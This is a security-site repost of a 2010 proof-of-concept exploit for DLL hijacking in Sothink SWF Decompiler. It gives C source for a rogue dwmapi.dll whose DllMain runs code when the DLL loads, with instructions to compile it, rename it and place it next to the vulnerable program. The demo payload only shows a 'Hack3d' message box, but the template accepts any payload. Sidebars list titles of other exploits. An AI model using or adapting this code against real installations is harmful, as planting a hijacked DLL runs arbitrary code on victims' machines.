首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sothink SWF Decompiler DLL Hijacking Exploit
来源:D3v-PoinT@hotmail.com 作者:Tr0J4n 发布时间:2010-09-23  
/*
#Sothink SWF Decompiler DLL Hijacking Exploit (dwmapi.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~,All Dev-poinT members and my friends
#Email   : D3v-PoinT@hotmail.com & C1EH@Hotmail.com
# Software Link:http://www.sothink.com/
#Tested on: Windows XP sp3
#how to use :
   Complile and rename to dwmapi.dll. Place it in the same dir  Execute to check the
  result > Hack3d




#dwmapi.dll (code)
*/

#include "stdafx.h"

void init() {
MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SEasyOfficeRecovery DLL Hijack
·VideoCharge Studio DLL Hijacki
·mobile ringtone audio converte
·MP3 Workstation Version 9.2.1.
·Adobe Acrobat Reader and Flash
·Skybluecanvas.v1.1-r248 CSRF v
·linux/x86 setuid(0) and dd of=
·Adobe Shockwave Director tSAC
·GreenBrowser DLL Hijacking Exp
·gausCMS Multiple Vulnerabiliti
·DVD PixPlay DLL Hijacking Expl
·Ubuntu Linux 'mountall' Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved